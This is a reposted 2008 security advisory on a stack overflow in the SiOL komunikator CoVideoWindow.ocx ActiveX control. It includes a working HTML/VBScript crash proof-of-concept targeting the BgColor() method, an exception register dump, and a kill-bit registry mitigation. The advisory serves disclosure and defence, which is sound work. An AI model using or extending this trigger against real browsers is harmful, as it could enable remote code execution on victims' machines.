SiOL komunikator IM ActiveX stack overflow condition

QQ空间 新浪微博 微信 QQ facebook twitter
漏洞ID 1052571 漏洞类型
发布时间 2008-08-07 更新时间 2008-08-07
CVE编号 N/A CNNVD-ID N/A
漏洞平台 N/A CVSS评分 N/A
|漏洞来源
https://cxsecurity.com/issue/WLB-2008080033
|漏洞详情
漏洞细节尚未披露
|漏洞EXP
=========================================================================

	  SiOL komunikator IM ActiveX stack overflow condition

=========================================================================

 Release date:    30.7.2008
 Severity:        Moderately critical
 Impact:          Stack overflow
 Remote:          Yes
 Status:          Unpatched
 Software:        SiOL Komunikator v1.3 (SLO_71130)
 Tested on:       Microsoft Windows XP SP3 / IE6 SP3
 Developer:       http://www.siol.net/
                  http://www.eyeball.com/
 Disclosed by:    Edi Strosar


Vendor's description of affected application:
=============================================
"SiOL komunikator je programska oprema za neposredno sporo?anje, ki podpira celovito komuniciranje s tekstovnimi sporo?ili, izmenjavo datotek ter monostjo glasovnih in video klicev, brez telefonskega aparata in s katerekoli lokacije, kjer je omogo?ena povezava v Internet."

English translation (sort of):
SiOL komunikator is an instant messaging (IM) application based on Eyeball Communicator offered by SiOL (Slovenia On-Line) ISP.

Download link:
http://www.siol.net/spletne_storitve/siol_komunikator.aspx


ActiveX control overview:
=========================
 Developer: Eyeball Networks, Inc.
 Version: 5.0.907.1
 Component: CoVideoWindow.ocx
 GUID: {CA06EE71-7348-44C4-9540-AAF0E6BD1515}
 RegKey Safe for Script: False
 RegKey Safe for Init: False
 Implements IObjectSafety: True
 KillBitSet: False


Description:
============
SiOL komunikator's ActiveX component CoVideoWindow.ocx is susceptible to stack overflow condition in BgColor() method which may lead to remote code execution. The vulnerability could be exploited if user with SiOL komunikator installed visits a specialy crafted web page.


Proof of concept:
=================
Following testcase will crash Internet Explorer:

<html>
 <object classid='clsid:CA06EE71-7348-44c4-9540-AAF0E6BD1515' id='test'></object>
  <input language=VBScript onclick=buffero() type=button value="Crash">
  <script language = 'vbscript'>
 Sub buffero()

  crash = String(515000, unescape("%41"))
  test.BgColor = crash
 End Sub

</script>
</html>

Note: close all Internet Explorer instances before executing PoC!

Tested with SiOL komunikator v1.3 (SLO_71130). Other versions may be affected.


Exception overview:
===================
----------------------------------------------------------------
Exception C00000FD (STACK_OVERFLOW)
----------------------------------------------------------------
 EAX=00000774: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 EBX=00000003: ?? ?? ?? ?? ?? ?? ?? ??-?? ?? ?? ?? ?? ?? ?? ??
 ECX=000428F4: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 EDX=000FB770: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 ESP=0013D8EC: C6 9A 80 7C 0D B9 E8 01-00 00 00 00 20 39 EC 01
 EBP=0013D904: 44 D9 13 00 1C 9F E8 01-1C D9 13 00 24 00 39 02
 ESI=000FB772: 00 00 00 00 00 00 00 00-00 00 00 00 00 00 00 00
 EDI=02390024: 41 00 41 00 41 00 41 00-41 00 41 00 41 00 41 00
 EIP=01E93635: 85 01 3D 00 10 00 00 73-EC 2B C8 8B C4 85 01 8B
              --> TEST [ECX],EAX
----------------------------------------------------------------


Mitigation:
===========
Set the kill bit (http://support.microsoft.com/kb/240797).

Paste the following text in a text editor such as Notepad. Then, save the file by using the .reg file name extension.

Windows Registry Editor Version 5.00

[HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Internet Explorer\ActiveX Compatibility\{CA06EE71-7348-44c4-9540-AAF0E6BD1515}]
"Compatibility Flags"=dword:00000400


Timeline:
=========
12.07.2008 - initial developer notification
	   - no response
20.07.2008 - additional developer notification
	   - no response
30.07.2008 - public disclosure


Contact:
========
edi [dot] strosar [at] gmail [dot] com


Disclaimer:
===========
The content of this report is purely informational and meant for educational purposes only. Author shall in no event be liable for any damage whatsoever, direct or implied, arising from use or spread of this information. Any use of information in this advisory is entirely at user's own risk.

=========================================================================